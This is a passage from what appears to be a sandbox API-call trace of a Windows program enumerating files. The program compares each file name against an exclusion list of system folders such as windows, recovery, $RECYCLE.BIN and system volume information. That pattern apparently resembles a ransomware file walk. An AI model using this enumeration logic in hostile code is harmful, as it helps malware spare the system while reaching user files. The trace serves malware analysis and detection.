(lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d698, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f3a8 [0126.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0126.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.489] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x61fe8c4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x61fe8c4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61fe8c4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.489] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0126.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0126.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0126.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0126.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.490] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b15891, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b15891, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b3bafd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fca98, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.490] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0126.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d920, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0126.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0126.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dba8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0126.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2450c8 [0126.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0126.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.491] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4cd5a2f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4cd5a2f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4cd5a2f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0126.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0126.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0126.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0126.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e7a0 [0126.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2450c8 | out: hHeap=0x1e0000) returned 1 [0126.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.491] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf475131d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf475131d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf475131d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1c038, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.491] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.492] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.492] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.492] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.492] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.492] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0126.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d770, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dba8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0126.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0126.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0126.492] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c20913, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c20913, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c20913, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28c8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MIE9BA~1.DLL")) returned 1 [0126.492] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.492] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.492] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.492] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.492] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.492] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.492] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.492] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.492] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.492] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d920, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0126.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d800, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dee0 [0126.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0126.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0126.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.493] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b3bafd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b3bafd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b3bafd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b050, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.493] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.493] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.493] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.493] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.493] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.493] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.493] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.493] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.493] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.493] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0126.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0126.493] RtlAllocateHeap (HeapHandle=0x1e0000, 